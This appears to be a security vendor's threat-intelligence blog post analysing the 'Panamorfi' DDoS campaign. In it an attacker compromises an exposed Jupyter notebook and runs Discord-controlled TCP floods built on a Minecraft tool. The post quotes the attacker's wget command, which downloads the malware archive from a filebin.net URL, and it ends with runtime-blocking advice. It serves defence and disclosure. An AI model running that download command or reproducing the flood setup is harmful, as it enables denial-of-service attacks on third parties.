Aqua Nautilus researchers uncovered a new Distributed Denial of Service (DDoS) campaign dubbed ‘Panamorfi’, utilizing the Java written minecraft DDoS package – mineping – the threat actor launches a DDoS. Thus far we’ve only seen it deployed via misconfigured Jupyter notebooks. In this blog we explain about this attack, the techniques used by the threat actor and how to protect your environments.
Attack flow
The threat actor ‘yawixooo’ gained initial access on our exposed to the world Jupyter notebook honeypot. Then ran the following command:
‘wget https://filebin.net/archive/h4fhifnlykw224h9/zip’
They downloaded a zip file with a random name h4fhifnlykw224h9 that was new on Virus Total and only had 1 detection by ESET. This zip file (MD5: 42989a405c8d7c9cb68c323ae9a9a318) size is ~17 MB and contains 2 Jar files.
Figure 1: The zip file with a single detection
These two Jar files were also new in VT and only had 1 detection each by ESET.
Figure 2: The conn.jar file with a single detection
Figure 3: The mineping.jar file with a single detection
The connector Jar file contains the initial execution code. As depicted below in the main function the threat actor is utilizing Discord to control the DDoS attack. The victims machine is connecting the Discord channel using the credentials specified below.
Figure 4: The main function of connector jar
It is loading mineping.jar which is a known DDoS minecraft server, and its code is available on GitHub. You can see in the code loading of the mineping.jar package in order to launch a TCP flood DDoS attack. This attack aims to consume the resources of the target server by sending a large number of TCP connection requests. The results are written to the Discord channel.
Figure 5: The function that updates the Discord channel
You can also see the threat actor identifies as ‘yawixooo’, loading a signature photo, enclosed below.
Figure 6: The Panamorfi DDoS logo
The package mineping.jar contains 12 java files, that enable among other loading http socket, using a proxy, flooding a victim, and creation of random connection details.
The threat actor
The threat actor identified themselves in the code as ‘yawixooo,’ which can be found on GitHub. During our investigation, it appears that the public repository is active. It contains a Minecraft server configuration and an HTML page that is currently under construction.
Figure 7: The GitHub profile of the threat actor
Figure 8: The website of the threat actor under construction
Detection and remediation with Aqua’s CNAPP
In this blog we covered an attack against a Jupyter notebook. Usually, data practitioners such as data engineers, data analysts and data scientists are the ones who use these kinds of applications. From what we have seen, we can say in both learning and practice, there is insufficient attention to security issues. Data practitioners often lack the knowledge and understanding; thus, they sometimes open room for misconfigurations or vulnerabilities.
In this case, we leveraged Aqua’s Runtime Protection solution to detect the drift event and block its execution. Aqua’s advanced behavioral detection capabilities identify malicious or suspicious behavior in runtime and the granular runtime policies effectively block the events in real time. While vulnerability management and misconfiguration remediation are important for an overall cloud native security posture, we must assume that an attacker can gain access by exploiting a zero-day or unpatched vulnerability or misconfiguration.
In this attack the next link in the attack kill chain (after the misconfiguration) is the payload. We assume that we can limit our data practitioners from executing anything out of the scope of the Jupyter notebook. Thus, we set our controls to block as can be seen in Figure 9 below.
Figure 9: The Jupyter notebook container runtime policy is set to block any drift (attempt to run executable not in the original image)
As you can see in Figure 10 below, our runtime policy blocks the file conn.jar from running. This de facto kills the entire attack.
Figure 10: Aqua’s runtime protection completely blocks the attack before it even started
